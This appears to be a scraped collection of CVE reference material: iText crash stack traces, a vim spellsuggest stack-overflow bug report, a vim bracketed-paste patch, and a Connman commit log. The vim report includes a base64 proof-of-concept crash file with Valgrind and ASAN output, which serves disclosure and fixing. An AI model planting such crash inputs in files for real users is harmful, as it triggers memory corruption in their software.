    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-739  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-740  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-773  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-792
5.  java.lang.NumberFormatException  
    \-- com.itextpdf.io.source.PdfTokenizer.getIntValue--PdfTokenizer.java-512  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-314  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-315
6.  java.lang.OutOfMemoryError  
    \-- com.itextpdf.kernel.pdf.PdfReader.readStreamBytesRaw--PdfReader.java-391  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.extendXref--PdfXrefTable.java-598
7.  java.lang.StackOverflowError  
    \-- com.itextpdf.io.source.ByteBuffer.append--ByteBuffer.java-110  
    \-- com.itextpdf.io.source.PdfTokenizer.getStringValue--PdfTokenizer.java-187  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-341  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-343  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-361  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-377  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-413  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-452  
    \-- com.itextpdf.io.source.PdfTokenizer.nextToken--PdfTokenizer.java-469  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-271  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-300  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-306  
    \-- com.itextpdf.io.source.PdfTokenizer.nextValidToken--PdfTokenizer.java-314  
    \-- com.itextpdf.io.source.RandomAccessFileOrArray.read--RandomAccessFileOrArray.java-138  
    \-- com.itextpdf.io.util.MessageFormatUtil.format--MessageFormatUtil.java-55  
    \-- com.itextpdf.kernel.pdf.PdfDictionary.putAll--PdfDictionary.java-333  
    \-- com.itextpdf.kernel.pdf.PdfName.compareTo--PdfName.java-1003  
    \-- com.itextpdf.kernel.pdf.PdfNumber.generateValue--PdfNumber.java-180  
    \-- com.itextpdf.kernel.pdf.PdfReader.readArray--PdfReader.java-944  
    \-- com.itextpdf.kernel.pdf.PdfReader.readDictionary--PdfReader.java-923  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1336  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1344  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-801  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-845  
    \-- com.itextpdf.kernel.pdf.PdfReader.readPdfName--PdfReader.java-912  
    \-- com.itextpdf.kernel.pdf.PdfReader.readReference--PdfReader.java-817  
    \-- com.itextpdf.kernel.pdf.PdfReader.readReference--PdfReader.java-834
8.  java.lang.StringIndexOutOfBoundsException  
    \-- com.itextpdf.io.source.PdfTokenizer.checkPdfHeader--PdfTokenizer.java-239

Any further discussion for these vulnerabilities including fix is welcomed and look forward to hearing from you.

CVE-2022-24197: A list of bugs found by ZanderHuang · Pull Request #78 · itext/itext7

Heap-based Buffer Overflow GitHub repository vim/vim prior to 8.2.

CVE-2022-0417: Heap-based Buffer Overflow in vim

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

CVE-2022-24130: XTERM - Change Log

Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

Stack overflow occurs in spellsuggest.c.

commit : 44db8213d38c39877d2148eff6a72f4beccfb94e

**Proof of Concept**

    $ echo -ne "bm9ybRZzMDAwRzAw/TAwMDAwMDAwMDAwMApzaWwwbm9ybS4udnpHLi4uLi4uLi4uLi4uLi4uLnZ2
    ekcwICAgICB2IHo9" | base64 -d > minimized_poc
    
    # Valgrind
    $ ./vg-in-place -s ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c ":qa!"
    ==596658== Memcheck, a memory error detector
    ==596658== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
    ==596658== Using Valgrind-3.19.0.GIT and LibVEX; rerun with -h for copyright info
    ==596658== Command: ../vim-valgrind/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c :qa!
    ==596658==
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658==
    ==596658== Process terminating with default action of signal 11 (SIGSEGV): dumping core
    ==596658==    at 0x4A2255B: kill (syscall-template.S:78)
    ==596658==    by 0x28FE98: may_core_dump (os_unix.c:3510)
    ==596658==    by 0x28FE4C: mch_exit (os_unix.c:3476)
    ==596658==    by 0x40A260: getout (main.c:1721)
    ==596658==    by 0x25302D: preserve_exit (misc1.c:2194)
    ==596658==    by 0x28E408: deathtrap (os_unix.c:1156)
    ==596658==    by 0x4A2220F: ??? (in /usr/lib/x86_64-linux-gnu/libc-2.31.so)
    ==596658==    by 0x32FCBC: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==
    ==596658== HEAP SUMMARY:
    ==596658==     in use at exit: 114,315 bytes in 593 blocks
    ==596658==   total heap usage: 1,864 allocs, 1,271 frees, 1,057,411 bytes allocated
    ==596658==
    ==596658== LEAK SUMMARY:
    ==596658==    definitely lost: 1,679 bytes in 6 blocks
    ==596658==    indirectly lost: 8 bytes in 3 blocks
    ==596658==      possibly lost: 268 bytes in 1 blocks
    ==596658==    still reachable: 112,360 bytes in 583 blocks
    ==596658==         suppressed: 0 bytes in 0 blocks
    ==596658== Rerun with --leak-check=full to see details of leaked memory
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    ==596658==
    ==596658== 1 errors in context 1 of 1:
    ==596658== Invalid read of size 4
    ==596658==    at 0x32FCBD: add_suggestion (spellsuggest.c:3530)
    ==596658==    by 0x32A8D1: suggest_trie_walk (spellsuggest.c:1639)
    ==596658==    by 0x1FFFFFFFF: ???
    ==596658==    by 0x10000000000FF00: ???
    ==596658==  Address 0x6000000008 is not stack'd, malloc'd or (recently) free'd
    ==596658==
    ==596658== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    Segmentation fault
    
    # ASAN
    $ ~/fuzzing/vim-asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S ~/fuzzing/valgrind/minimized_poc ":qa!"
    =================================================================
    ==250851==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff6b20 at pc 0x000000496710 bp 0x7fffffff3d10 sp 0x7fffffff34d8
    WRITE of size 32 at 0x7fffffff6b20 thread T0
        #0 0x49670f in __asan_memcpy (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f)
        #1 0xb08866 in go_deeper /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:2664:24
        #2 0xb08866 in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1766:4
        #3 0xafa3e1 in suggest_try_change /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1199:2
        #4 0xafa3e1 in spell_suggest_intern /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:995:5
        #5 0xafa3e1 in spell_find_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:870:6
        #6 0xaf6ffd in spell_suggest /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:545:5
        #7 0x894d7b in nv_zet /home/alkyne/fuzzing/vim-asan/src/normal.c:3398:7
        #8 0x864da8 in normal_cmd /home/alkyne/fuzzing/vim-asan/src/normal.c:1238:5
        #9 0x6a1a76 in exec_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c
        #10 0x6a0bb1 in exec_normal_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8592:5
        #11 0x6a0bb1 in ex_normal /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:8510:6
        #12 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #13 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #14 0xa71d9d in do_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1512:5
        #15 0xa7042d in cmd_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1098:14
        #16 0xa7042d in ex_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1124:2
        #17 0x67e82c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
        #18 0x67e82c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
        #19 0xd97b27 in exe_commands /home/alkyne/fuzzing/vim-asan/src/main.c:3091:2
        #20 0xd97b27 in vim_main2 /home/alkyne/fuzzing/vim-asan/src/main.c:774:2
        #21 0xd95139 in main /home/alkyne/fuzzing/vim-asan/src/main.c:426:12
        #22 0x7ffff7c260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41eacd in _start (/home/alkyne/fuzzing/vim-asan/src/vim+0x41eacd)
    
    Address 0x7fffffff6b20 is located in stack of thread T0 at offset 11776 in frame
        #0 0xb01cbf in suggest_trie_walk /home/alkyne/fuzzing/vim-asan/src/spellsuggest.c:1247
    
      This frame has 11 object(s):
        [32, 152) 'stack.i.i.i' (line 4307)
        [192, 200) 'p.i.i.i' (line 4316)
        [224, 1240) 'wbadword.i.i.i' (line 4317)
        [1376, 2392) 'wgoodword.i.i.i' (line 4318)
        [2528, 2648) 'stack.i.i' (line 4132)
        [2688, 2942) 'theword.i' (line 3169)
        [3008, 3262) 'cword.i' (line 3267)
        [3328, 3582) 'tword' (line 1248)
        [3648, 11776) 'stack' (line 1249) <== Memory access at offset 11776 overflows this variable
        [12032, 12794) 'preword' (line 1250)
        [12928, 13182) 'compflags' (line 1255)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/alkyne/fuzzing/vim-asan/src/vim+0x49670f) in __asan_memcpy
    Shadow bytes around the buggy address:
      0x10007fff6d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007fff6d60: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d70: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10007fff6d80: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff6db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==250851==ABORTING
    

**Impact**

Stack bof may lead to exploit the program.

CVE-2022-0408: Stack-based Buffer Overflow in vim

Heap-based Buffer Overflow in GitHub repository vim prior to 8.2.

Permalink

Browse files

patch 8.2.4218: illegal memory access with bracketed paste in Ex mode

Problem:    Illegal memory access with bracketed paste in Ex mode.
Solution:   Reserve space for the trailing NUL.

*   Loading branch information

1 parent 8d02ce1 commit 806d037671e133bd28a7864248763f643967973a

Showing **3 changed files** with **7 additions** and **1 deletion**.

*   *   edit.c
    *   *   test\_paste.vim
    *   version.c

@@ -4452,7 +4452,8 @@ bracketed\_paste(paste\_mode\_T mode, int drop, garray\_T \*gap)

break;

  

case PASTE\_EX:

if (gap != NULL && ga\_grow(gap, idx) == OK)

// add one for the NUL that is going to be appended

if (gap != NULL && ga\_grow(gap, idx + 1) == OK)

{

mch\_memmove((char \*)gap->ga\_data + gap->ga\_len,

buf, (size\_t)idx);

@@ -90,6 +90,9 @@ func Test\_paste\_ex\_mode()

unlet! foo

call feedkeys("Qlet foo=\\"\\<Esc>\[200~foo\\<CR>bar\\<Esc>\[201~\\"\\<CR>vi\\<CR>", 'xt')

call assert\_equal("foo\\rbar", foo)

  

" pasting more than 40 bytes

exe "norm Q\\<PasteStart>0000000000000000000000000000000000000000000000000000000000000000000000\\<C-C>"

endfunc

  

func Test\_paste\_onechar()

@@ -750,6 +750,8 @@ static char \*(features\[\]) =

  

static int included\_patches\[\] =

{ /\* Add new patch number below this line \*/

/\*\*/

4218,

/\*\*/

4217,

/\*\*/

**0 comments on commit 806d037**

Please sign in to comment.

CVE-2022-0392: patch 8.2.4218: illegal memory access with bracketed paste in Ex mode · vim/vim@806d037

An issue was discovered in the DNS proxy in Connman through 1.40. The TCP server reply implementation has an infinite loop if no data is received.

AgeCommit message (Expand)AuthorFilesLines 12 dayswispr: Simplify the IP version checkHEADmasterDaniel Wagner1\-5/+1 12 dayswispr: Fix context refcounting in wispr\_portal\_request\_portal()Daniel Wagner1\-5/+5 12 daysservice: Track online check for IPv4 and IPv6 separatelyDaniel Wagner1\-12/+27 2022-08-28ipconfig: Don't add invalid gateway routesDaniel Wagner1\-1/+1 2022-08-28wisrp: Handle wispr\_portal\_detect failuresDaniel Wagner1\-24/+32 2022-08-28resolver: Add path to resolv.conf to config optionsJakub Jirutka3\-7/+48 2022-08-01AUTHORS: Mention Nathan's contributionsDaniel Wagner1\-0/+1 2022-08-01gweb: Fix OOB write in received\_data()Nathan Crandall1\-1/+1 2022-08-01wispr: Update portal context referencesDaniel Wagner1\-12/+22 2022-08-01wispr: Add reference counter to portal contextDaniel Wagner1\-10/+42 2022-08-01wispr: Ignore NULL proxyDaniel Wagner1\-1/+1 2022-08-01wispr: Rename wispr\_portal\_list to wispr\_portal\_hashDaniel Wagner1\-11/+11 2022-05-25wispr: Prevent use-after-free from \_\_connman\_wispr\_stop()Seung-Woo Kim1\-11/+5 2022-05-25doc: Add note SingleConnectedTechnology can't be used with VPNDaniel Wagner1\-1/+2 2022-05-16service: Add "Ethernet" property for VPN into n.c.Manager GetServicesJakub Jirutka1\-1/+1 2022-05-16clock: fix time update transition auto->manualRyan Smith1\-6/+3 2022-04-14wispr: Fix online check when using WPAD/PACRyan Smith1\-6/+30 2022-04-14dhcp: Set proxy properly when applying DHCP leaseRyan Smith1\-2/+1 2022-04-14gdhcp: fix server address byte orderRyan Smith1\-1/+1 2022-04-14iwd: Fix connection with invalid passphrase formatEmmanuel VAUTRIN1\-1/+3 2022-04-08AUTHORS: Mention Daniel's contributionsDaniel Wagner1\-0/+1 2022-04-08vpn: Replace hardcoded paths with RUNSTATEDIRDaniel Linjama2\-3/+3 2022-04-08build: Support configurable run dir with RUNSTATEDIRDaniel Linjama2\-0/+3 2022-04-08ofono: Do not change regdom when it follows timezoneJussi Laakkonen1\-0/+5 2022-04-08timezone: Change regdom along timezone, use localtime configJussi Laakkonen1\-5/+100 2022-04-08main: Add RegdomFollowsTimezone option for regdom changesJussi Laakkonen2\-0/+19 2022-04-08main: Add path to localtime to config options.Jussi Laakkonen2\-0/+22 2022-04-08timeserver: include the reason why a timeserver sync is requestedNicky Geerts4\-7/+35 2022-03-07timeserver: refresh the nameservers before each lookupNicky Geerts1\-41/+46 2022-03-04iwd: Forget network on service removalEmmanuel VAUTRIN5\-0/+58 2022-03-04dnsproxy: add standalone test version of dnsproxy and a test script for itMatthias Gerstner4\-1/+284 2022-02-27service: Check if hidden service has a pending request on agentJussi Laakkonen1\-1/+4 2022-02-27agent: Add support to check for active pending requestsJussi Laakkonen4\-0/+39 2022-02-27AUTHORS: Mention Sebastian's contributionsDaniel Wagner1\-0/+1 2022-02-27vpn/vpn-polkit.policy: Replace unsupported "auth\_\*\_keep\_session" by "auth\_\*\_k...Sebastian Pipping1\-2/+2 2022-02-27iwd: Fix disabling tethering not working for brcmfmacJonathan Liu1\-5/+4 2022-02-27main: Set default online check URL also when no config providedDaniel Wagner1\-2/+8 2022-02-21dnsproxy-test: support command line specification of dnsproxy portMatthias Gerstner1\-2/+9 2022-02-21dnsproxy: support programmatic configuration of the default listen portMatthias Gerstner2\-2/+9 2022-02-21.gitignore: also ignore emacs backup filesMatthias Gerstner1\-0/+1 2022-02-21dnsproxy: protocol\_offset: remove error return case and return size\_tMatthias Gerstner1\-27/+14 2022-02-21dnsproxy: remove unnecessarily shadowed variableMatthias Gerstner1\-1/+1 2022-02-21dnsproxy: remove unused domain parameter from \`remove\_server()\`Matthias Gerstner1\-4/+3 2022-02-21iwd: Use same signal strength calculation as wpa\_supplicantJonathan Liu1\-1/+3 2022-02-21iwd: Fix typo in warning message when enabling AccessPoint modeJonathan Liu1\-1/+1 2022-02-21wifi: Duplicate GSupplicantSSID pointer membersNiel Fourie2\-39/+83 2022-01-28Release 1.411.41Marcel Holtmann2\-1/+9 2022-01-25unit: Fix missing declarations in test-iptablesEmmanuel VAUTRIN1\-2/+2 2022-01-25AUTHORS: Add Matthias' contributionsDaniel Wagner1\-0/+1 2022-01-25dnsproxy: Keep timeout in TCP case even after connection is establishedMatthias Gerstner1\-5/+0 2022-01-25dnsproxy: Avoid 100 % busy loop in TCP server caseMatthias Gerstner1\-0/+12 2022-01-25dnsproxy: Validate input data before using themDaniel Wagner1\-5/+26 2022-01-25dnsproxy: Update TCP length headerMatthias Gerstner1\-0/+3 2022-01-25main: Use g\_strdup for online\_check\_ipv{4,6}\_url configDaniel Wagner1\-2/+9 2022-01-23service: Fix native connection with wrong passphraseEmmanuel VAUTRIN1\-0/+9 2022-01-21iwd: Mark only reachable networks as availableEmmanuel VAUTRIN1\-1/+3 2022-01-21iwd: Fix connection with no passphraseEmmanuel VAUTRIN1\-0/+2 2022-01-21iwd: Fix station in scan callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-12-19AUTHORS: Mention Christian's contributionsDaniel Wagner1\-0/+1 2021-12-19ipconfig: Do not enable/disable ipv6 for all ifsChristian Taedcke1\-0/+6 2021-12-19Add ObjectManager interface to connmanMichael Trimarchi1\-1/+1 2021-11-18service: Support hot-plug of technologies by updating ipconfig indexJussi Laakkonen1\-2/+15 2021-11-18openvpn: Improve configuration value processingJussi Laakkonen1\-44/+76 2021-11-18vpn-provider: Support checking if provider setting key exists.Jussi Laakkonen2\-0/+8 2021-10-26tether: Fix connman\_technology\_get\_wifi\_tetheringMichael Trimarchi1\-2/+6 2021-10-20dnsproxy: Fix uninitialized false positive in dnsproxyEmmanuel VAUTRIN1\-1/+1 2021-10-20tools: Fix uninitialized errors in iptables testsEmmanuel VAUTRIN2\-2/+2 2021-10-20config: Cleanup of iwd provision\_service\_wifi()Emmanuel VAUTRIN1\-4/+2 2021-10-15gsupplicant: Fix error return typeDaniel Wagner1\-2/+2 2021-10-15inet: Remove unused ipv6\_addr\_advert\_multDaniel Wagner1\-7/+0 2021-10-15build: Only enable -Wcast-align for gccDaniel Wagner1\-1/+3 2021-10-15client: Update the connmactl to support optional tethering channelMichael Trimarchi1\-14/+46 2021-10-15tethering: Add TetheringFreq parameter documentationMichael Trimarchi1\-0/+7 2021-10-15tethering: Add possibility to configure the access point frequencyMichael Trimarchi5\-7/+52 2021-10-15tethering: Reduce the number of parameters of tech\_set\_tetheringMichael Trimarchi8\-32/+33 2021-10-04AUTHORS: Mention Michael's contributionsDaniel Wagner1\-0/+1 2021-10-04manager: Add TetheringClientsChanged GBUS\_SIGNALMichael Trimarchi1\-0/+3 2021-10-04service: Report errors to user in native modeVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-10-04iwd: Fix timeout error on new connectionVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-10-04iwd: Fix improper IPv4/6 attributes when disconnectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+2 2021-10-04iwd: Fix missing Ethernet attributesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+8 2021-09-13doc: Document AuthErrorLimit in VPN connection APIJussi Laakkonen1\-0/+13 2021-09-13openvpn: Default to 10 AuthErrorLimit unless set by userJussi Laakkonen1\-0/+9 2021-09-13vpn-provider: Add auth error check heuristic to avoid losing credsJussi Laakkonen2\-0/+112 2021-09-13vpn-provider: Ignore error adding when state is idle/unknownJussi Laakkonen1\-0/+15 2021-09-13vpn: Report EALREADY back to caller if VPN is already disconnectingJussi Laakkonen1\-1/+2 2021-09-13gsupplicant: Add support for WPA3-Personal transition modeAriel D'Alessandro1\-10/+19 2021-08-31doc: Add new openconnect input fieldsLukáš Karas1\-0/+13 2021-08-30openconnect: Add support for 2nd passwordLukáš Karas2\-2/+85 2021-08-30vpn: Refactor connect\_reply() and handle NoCarrier -> ENOLINK errorJussi Laakkonen1\-2/+12 2021-08-30vpn-provider: Implement connmand online state checkingJussi Laakkonen1\-1/+356 2021-08-30service: Do not trigger wispr start when EnableOnlineCheck is disabledDaniel Wagner1\-0/+6 2021-08-30service: Move wispr start code into helperDaniel Wagner1\-16/+15 2021-08-29network: Do not disconnect decice on network connectDaniel Wagner1\-2/+0 2021-08-29service: Prevent auto connection during passphrase requestVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+25 2021-08-29wispr: Add online check url config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-15/+68 2021-08-29service: Fix default service update on ready stateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+2 2021-08-29service: Ignore state information in service reorderingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+1 2021-08-17pptp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-43/+84 2021-08-17l2tp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-40/+75 2021-08-17l2tp: Create control file for xl2tpdMatt Vogt1\-2/+16 2021-07-28gdhcp: Do not process missing DHCP\_SERVER\_ID fieldsDaniel Wagner1\-0/+5 2021-07-26service: service\_update\_preferred\_order cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-17/+5 2021-07-20AUTHORS: Fix Rahul's email addressDaniel Wagner1\-1/+1 2021-07-20main: Fix a memory leak for str\_list in parse\_configRahul Jain1\-0/+2 2021-07-02service: apply\_relevant\_default\_downgrade cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+3 2021-07-02service: Let PreferredTechnologies overrule connected service sortingDaniel Wagner1\-13/+27 2021-06-30agent: Always inform upper layer via callbackDaniel Wagner1\-1/+1 2021-06-23service: Ask for password when using native autoconnectDaniel Wagner1\-1/+2 2021-06-23iwd: Do not try to handle out of memory failsDaniel Wagner1\-38/+6 2021-06-23vpn-rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-23rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-21README: Add IRC channel infoDaniel Wagner1\-0/+4 2021-06-21AUTHORS: Mention Lukáš' contributionsDaniel Wagner1\-0/+1 2021-06-21dnsproxy: Replace strncopy by memcpyLukáš Karas1\-1/+1 2021-06-14AUTHORS: Mention Ariel's contributionsDaniel Wagner1\-0/+1 2021-06-14wifi: Add wpa\_supplicant WPA3-SAE supportAriel D'Alessandro3\-3/+57 2021-06-10Release 1.401.40Marcel Holtmann2\-1/+6 2021-06-09AUTHORS: Mention Alyssa's contributionsDaniel Wagner1\-0/+1 2021-06-09README: fix typoAlyssa Ross1\-1/+1 2021-06-07AUTHORS: Mention Valery's contributionsDaniel Wagner1\-0/+1 2021-06-07dnsproxy: Check the length of buffers before memcpyValery Kashcheev1\-9/+11 2021-06-02README: Update mailing list infoDaniel Wagner1\-2/+8 2021-05-14README: Remove the 01.org website and the 01.org JiraMarcel Holtmann1\-5/+1 2021-05-13main: Cleanup of vendor class id and wifi config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)7\-46/+10 2021-05-05wispr: Support of common redirection status codesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+5 2021-04-27timerserver: Fix time update manual->autoDaniel Wagner1\-2/+2 2021-04-25service: Disable native autoconnect calls for providersDaniel Wagner1\-2/+2 2021-04-18peer: Open code g\_memdupDaniel Wagner1\-1/+4 2021-04-18wifi: Open code g\_memdupDaniel Wagner1\-7/+18 2021-04-18Rewrite openconnect plugin to use libopenconnectSanttu Lakkala3\-382/+525 2021-04-18service: Teach autoconnect algorithm native modeDaniel Wagner2\-29/+56 2021-04-18network: Add \_\_connman\_network\_native\_autoconnect()Daniel Wagner2\-0/+8 2021-04-18iwd: Filter out connect failure for auto connect modeDaniel Wagner1\-1/+1 2021-04-18iwd: Init AutoConnect of know networksDaniel Wagner1\-0/+26 2021-04-18service: Factor auto connect trigger code into a new functionDaniel Wagner1\-34/+40 2021-04-18service: Remove unused \_\_connman\_service\_disconnect\_all()Daniel Wagner2\-31/+0 2021-04-05wireguard: Copy interfance names obeying lengths rulesDaniel Wagner1\-1/+1 2021-04-05ethernet: Copy interfance names obeying lengths rulesDaniel Wagner1\-5/+7 2021-04-05ipconfig: Refactor /proc value get/set to separate functionsJussi Laakkonen1\-85/+97 2021-04-05service: Sort VPNs using the transport service if connectedJussi Laakkonen1\-0/+45 2021-04-05provider: Add function to get transport ident from VPNJussi Laakkonen2\-0/+11 2021-04-05vpn: Return transport ident with get\_property()Jussi Laakkonen1\-7/+15 2021-03-27dnsproxy: Enable DNS servers on connected VPN if split routing changesJussi Laakkonen1\-0/+11 2021-03-27timeserver: Fix false error messageJustin Maggard1\-1/+1 2021-03-27iwd: Fix typo in error message when stopping AccessPoint modeJonathan Liu1\-1/+1 2021-03-27service: Allow only user connection after WiFi failureVAUTRIN Emmanuel (Canal Plus Prestataire)1\-4/+10 2021-03-27service: Fix disconnection search before connectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-03-27service: Complete only after user connection retriesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+3 2021-03-27mailmap: Update non-canonical log entriesDaniel Wagner1\-0/+3 2021-02-24service: Add online to ready transition featureEmmanuel VAUTRIN6\-13/+78 2021-02-22service: Fix integer type for online check intervalDaniel Wagner1\-3/+3 2021-02-15service: Add online check interval config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-19/+88 2021-02-15wifi: Reset disconnecting status of any networkVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-10wifi: Check valid network in disconnect callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-08Release 1.391.39Marcel Holtmann2\-1/+7 2021-02-05AUTHORS: Mention Colin's contributionsDaniel Wagner1\-0/+1 2021-02-05dnsproxy: Add length checks to prevent buffer overflowColin Wee1\-3/+11 2021-02-05gdhcp: Avoid leaking stack data via unitiialized variableColin Wee1\-1/+1 2021-02-05gdhcp: Avoid reading invalid data in dhcp\_get\_optionColin Wee4\-20/+38 2021-02-05service: Restart online check when default service changesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+10 2021-02-05timeserver: Reset time sync on system timeserver updateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-05clock: Add TimeSynced signal emitted when the system time has been syncedVAUTRIN Emmanuel (Canal Plus Prestataire)4\-1/+67 2021-01-25AUTHORS: Mention Gabriel's contributionsDaniel Wagner1\-0/+1 2021-01-25wifi: Always disconnect connection completelyGabriel FORTE1\-8/+37 2020-12-28timeserver: Split new service and configuration updateDaniel Wagner3\-27/+33 2020-12-28services: Escape passphrase stringDaniel Wagner2\-7/+17 2020-12-23wifi: Base BSS expiration age on long scanning intervalEmmanuel VAUTRIN1\-0/+21 2020-12-22wifi: Fix wireless interface not being added to tether bridge sometimesJonathan Liu1\-4/+5 2020-12-22openvpn: Update documemtation for --protoDaniel Wagner1\-1/+1 2020-12-22vpnc: Do not lose credentials with VPN agent timeoutsJussi Laakkonen1\-6/+15 2020-12-14vpn: Export vpn\_ipconfig\_foreach as linker symbolDaniel Wagner4\-4/+4 2020-12-14vpn: Do not do mixed declerations and codeDaniel Wagner1\-18/+14 2020-12-14src: Test return value of inet\_pton consistentlyDaniel Wagner5\-17/+17 2020-12-11doc: Document VPN connection SplitRouting booleanJussi Laakkonen1\-1/+8 2020-12-11vpn-provider: Support SplitRouting option from connmandJussi 